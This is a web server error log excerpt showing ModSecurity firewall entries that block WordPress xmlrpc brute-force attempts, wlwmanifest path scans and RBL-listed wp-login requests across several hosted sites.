[Tue May 26 19:30:27.669080 2026] [security2:error] [pid 49598:tid 49780] [client 91.245.236.124:17037] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWne-zJzkdc0WtdrwtszQAAALk"]
[Tue May 26 19:30:27.741371 2026] [security2:error] [pid 49598:tid 49811] [client 35.255.164.74:49401] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWne-zJzkdc0Wtdrwts0AAAANg"]
[Tue May 26 19:30:28.204523 2026] [security2:error] [pid 49598:tid 49799] [client 35.255.164.74:60913] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWnfOzJzkdc0Wtdrwts3QAAAMw"]
[Tue May 26 19:30:28.366716 2026] [security2:error] [pid 49598:tid 49726] [remote 74.91.224.220:37706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnfOzJzkdc0Wtdrwts2QAA6H8"]
[Tue May 26 19:30:28.444313 2026] [security2:error] [pid 49598:tid 49741] [client 91.245.236.124:51617] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnfOzJzkdc0Wtdrwts6AAAAJI"]
[Tue May 26 19:30:28.444426 2026] [security2:error] [pid 49598:tid 49741] [client 91.245.236.124:51617] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnfOzJzkdc0Wtdrwts6AAAAJI"]
[Tue May 26 19:30:28.528480 2026] [security2:error] [pid 49598:tid 49790] [client 35.255.164.74:52501] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWnfOzJzkdc0Wtdrwts6wAAAMM"]
[Tue May 26 19:30:28.829423 2026] [security2:error] [pid 49598:tid 49637] [remote 82.196.25.136:59430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnfOzJzkdc0Wtdrwts7gAAziY"]
[Tue May 26 19:30:28.932023 2026] [security2:error] [pid 49598:tid 49635] [remote 132.148.78.219:49370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnfOzJzkdc0Wtdrwts9AAAjCQ"]
[Tue May 26 19:30:28.985806 2026] [security2:error] [pid 49598:tid 49749] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnfOzJzkdc0Wtdrwts7AAAAJo"]
[Tue May 26 19:30:29.095797 2026] [security2:error] [pid 49598:tid 49770] [client 35.255.164.74:52768] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWnfezJzkdc0Wtdrwts_QAAAK8"]
[Tue May 26 19:30:29.216377 2026] [security2:error] [pid 49598:tid 49834] [client 145.255.8.193:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnfOzJzkdc0Wtdrwts-QAAAO8"]
[Tue May 26 19:30:29.219720 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:11307] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnfezJzkdc0WtdrwttAQAAAOc"]
[Tue May 26 19:30:29.219837 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:11307] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnfezJzkdc0WtdrwttAQAAAOc"]
[Tue May 26 19:30:29.302479 2026] [security2:error] [pid 49598:tid 49619] [remote 132.148.78.219:49370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnfezJzkdc0WtdrwttAgAA1xQ"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:30:29.438598 2026] [security2:error] [pid 49598:tid 49839] [client 35.255.164.74:60636] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWnfezJzkdc0WtdrwttDAAAAPQ"]
[Tue May 26 19:30:29.811537 2026] [security2:error] [pid 49598:tid 49827] [client 35.255.164.74:64972] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWnfezJzkdc0WtdrwttEwAAAOg"]
[Tue May 26 19:30:29.984054 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:12709] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnfezJzkdc0WtdrwttFwAAAIk"]
[Tue May 26 19:30:29.984182 2026] [security2:error] [pid 49598:tid 49732] [client 91.245.236.124:12709] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnfezJzkdc0WtdrwttFwAAAIk"]
[Tue May 26 19:30:30.212275 2026] [security2:error] [pid 49598:tid 49813] [client 35.255.164.74:51921] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWnfuzJzkdc0WtdrwttHAAAANo"]
[Tue May 26 19:30:30.742057 2026] [security2:error] [pid 49598:tid 49832] [client 35.255.164.74:63406] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWnfuzJzkdc0WtdrwttLgAAAO0"]
[Tue May 26 19:30:30.776648 2026] [security2:error] [pid 49598:tid 49755] [client 91.245.236.124:44187] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnfuzJzkdc0WtdrwttLwAAAKA"]
[Tue May 26 19:30:30.776783 2026] [security2:error] [pid 49598:tid 49755] [client 91.245.236.124:44187] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnfuzJzkdc0WtdrwttLwAAAKA"]
[Tue May 26 19:30:31.028053 2026] [security2:error] [pid 49598:tid 49758] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnfuzJzkdc0WtdrwttLQAAAKM"]
[Tue May 26 19:30:31.287014 2026] [security2:error] [pid 49598:tid 49836] [client 35.255.164.74:56487] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "wpdev.wrapmachines.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWnf-zJzkdc0WtdrwttOgAAAPE"]
[Tue May 26 19:30:31.401812 2026] [security2:error] [pid 49598:tid 49622] [remote 74.91.224.220:37706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnf-zJzkdc0WtdrwttQQAAtxc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:30:31.542198 2026] [security2:error] [pid 49598:tid 49776] [client 91.245.236.124:35515] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnf-zJzkdc0WtdrwttRQAAALU"]
[Tue May 26 19:30:31.542315 2026] [security2:error] [pid 49598:tid 49776] [client 91.245.236.124:35515] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnf-zJzkdc0WtdrwttRQAAALU"]
[Tue May 26 19:30:32.323545 2026] [security2:error] [pid 49598:tid 49837] [client 91.245.236.124:24769] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWngOzJzkdc0WtdrwttUwAAAPI"]
[Tue May 26 19:30:32.323683 2026] [security2:error] [pid 49598:tid 49837] [client 91.245.236.124:24769] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWngOzJzkdc0WtdrwttUwAAAPI"]
[Tue May 26 19:30:33.101031 2026] [security2:error] [pid 49598:tid 49841] [client 91.245.236.124:24441] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWngezJzkdc0WtdrwttbAAAAPY"]
[Tue May 26 19:30:33.101213 2026] [security2:error] [pid 49598:tid 49841] [client 91.245.236.124:24441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWngezJzkdc0WtdrwttbAAAAPY"]
[Tue May 26 19:30:33.292255 2026] [security2:error] [pid 49598:tid 49754] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWngOzJzkdc0WtdrwttaAAAAJ8"]
[Tue May 26 19:30:33.865485 2026] [security2:error] [pid 49598:tid 49844] [client 91.245.236.124:14201] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWngezJzkdc0WtdrwttfQAAAPk"]
[Tue May 26 19:30:33.865611 2026] [security2:error] [pid 49598:tid 49844] [client 91.245.236.124:14201] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWngezJzkdc0WtdrwttfQAAAPk"]
[Tue May 26 19:30:34.131814 2026] [security2:error] [pid 49598:tid 49631] [remote 39.97.110.217:33306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 217.110.97.39.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWngezJzkdc0WtdrwttgQABBCA"]
[Tue May 26 19:30:34.631371 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:16341] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnguzJzkdc0WtdrwttjQAAAOc"]
[Tue May 26 19:30:34.631484 2026] [security2:error] [pid 49598:tid 49826] [client 91.245.236.124:16341] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnguzJzkdc0WtdrwttjQAAAOc"]
[Tue May 26 19:30:34.770807 2026] [security2:error] [pid 49598:tid 49644] [remote 39.97.110.217:33306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 217.110.97.39.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWnguzJzkdc0WtdrwttjwAAii0"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 19:30:35.383735 2026] [security2:error] [pid 49598:tid 49817] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnguzJzkdc0WtdrwttmAAAAN4"]
[Tue May 26 19:30:35.398361 2026] [security2:error] [pid 49598:tid 49771] [client 91.245.236.124:20981] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWng-zJzkdc0WtdrwttoAAAALA"]
[Tue May 26 19:30:35.398472 2026] [security2:error] [pid 49598:tid 49771] [client 91.245.236.124:20981] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWng-zJzkdc0WtdrwttoAAAALA"]
[Tue May 26 19:30:35.734312 2026] [security2:error] [pid 49598:tid 49787] [client 66.249.73.226:36467] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "www.pestcontroldelhi.co.in"] [uri "/robots.txt"] [unique_id "ahWng-zJzkdc0WtdrwttqgAAAMA"]
[Tue May 26 19:30:36.161199 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:43015] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnhOzJzkdc0WtdrwtttAAAAOQ"]
[Tue May 26 19:30:36.161352 2026] [security2:error] [pid 49598:tid 49823] [client 91.245.236.124:43015] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnhOzJzkdc0WtdrwtttAAAAOQ"]
[Tue May 26 19:30:36.720599 2026] [security2:error] [pid 49598:tid 49724] [remote 45.79.189.31:14078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnhOzJzkdc0WtdrwtttwAAwn0"]
[Tue May 26 19:30:36.928842 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:16453] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnhOzJzkdc0WtdrwttxwAAANU"]
[Tue May 26 19:30:36.928942 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:16453] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnhOzJzkdc0WtdrwttxwAAANU"]
[Tue May 26 19:30:37.635162 2026] [security2:error] [pid 49598:tid 49850] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnhezJzkdc0Wtdrwtt0QAAAP8"]
[Tue May 26 19:30:37.706334 2026] [security2:error] [pid 49598:tid 49825] [client 91.245.236.124:65183] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnhezJzkdc0Wtdrwtt5wAAAOY"]
[Tue May 26 19:30:37.706452 2026] [security2:error] [pid 49598:tid 49825] [client 91.245.236.124:65183] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnhezJzkdc0Wtdrwtt5wAAAOY"]
[Tue May 26 19:30:38.141417 2026] [security2:error] [pid 49598:tid 49844] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnhuzJzkdc0WtdrwtuBgAAAPk"]
[Tue May 26 19:30:38.141442 2026] [security2:error] [pid 49598:tid 49844] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnhuzJzkdc0WtdrwtuBgAAAPk"]
[Tue May 26 19:30:38.141847 2026] [security2:error] [pid 49598:tid 49737] [client 65.109.156.37:60306] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWnhuzJzkdc0WtdrwtuBAAAAI4"]
[Tue May 26 19:30:38.470642 2026] [security2:error] [pid 49598:tid 49828] [client 91.245.236.124:55133] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnhuzJzkdc0WtdrwtuFgAAAOk"]
[Tue May 26 19:30:38.470743 2026] [security2:error] [pid 49598:tid 49828] [client 91.245.236.124:55133] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnhuzJzkdc0WtdrwtuFgAAAOk"]
[Tue May 26 19:30:38.680720 2026] [security2:error] [pid 49598:tid 49832] [client 65.109.156.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnhuzJzkdc0WtdrwtuHQAAAO0"]
[Tue May 26 19:30:38.680750 2026] [security2:error] [pid 49598:tid 49832] [client 65.109.156.37:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnhuzJzkdc0WtdrwtuHQAAAO0"]
[Tue May 26 19:30:38.688409 2026] [security2:error] [pid 49598:tid 49749] [client 65.109.156.37:60529] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/blog-2/blog-boxed-bigtext/"] [unique_id "ahWnhuzJzkdc0WtdrwtuGwAAAJo"]
[Tue May 26 19:30:38.759802 2026] [http2:info] [pid 58470:tid 58470] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 19:30:38.940613 2026] [security2:error] [pid 58470:tid 58601] [client 50.67.210.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWnhrnjVHRH3AGGvmb3xAAAAQA"], referer: https://ndequipments.com/contact-us/
[Tue May 26 19:30:39.249606 2026] [security2:error] [pid 58470:tid 58616] [client 91.245.236.124:39869] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnh7njVHRH3AGGvmb30gAAABA"]
[Tue May 26 19:30:39.249761 2026] [security2:error] [pid 58470:tid 58616] [client 91.245.236.124:39869] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnh7njVHRH3AGGvmb30gAAABA"]
[Tue May 26 19:30:39.579418 2026] [security2:error] [pid 49598:tid 49747] [client 50.67.210.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWnhuzJzkdc0WtdrwtuIgAAmG8"], referer: https://ndequipments.com/contact-us/
[Tue May 26 19:30:39.674066 2026] [security2:error] [pid 58470:tid 58643] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnh7njVHRH3AGGvmb31AAAACs"]
[Tue May 26 19:30:40.026383 2026] [security2:error] [pid 58470:tid 58654] [client 91.245.236.124:29887] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWniLnjVHRH3AGGvmb34gAAADY"]
[Tue May 26 19:30:40.026530 2026] [security2:error] [pid 58470:tid 58654] [client 91.245.236.124:29887] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWniLnjVHRH3AGGvmb34gAAADY"]
[Tue May 26 19:30:40.786092 2026] [security2:error] [pid 58470:tid 58693] [client 91.245.236.124:54431] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWniLnjVHRH3AGGvmb39gAAAF0"]
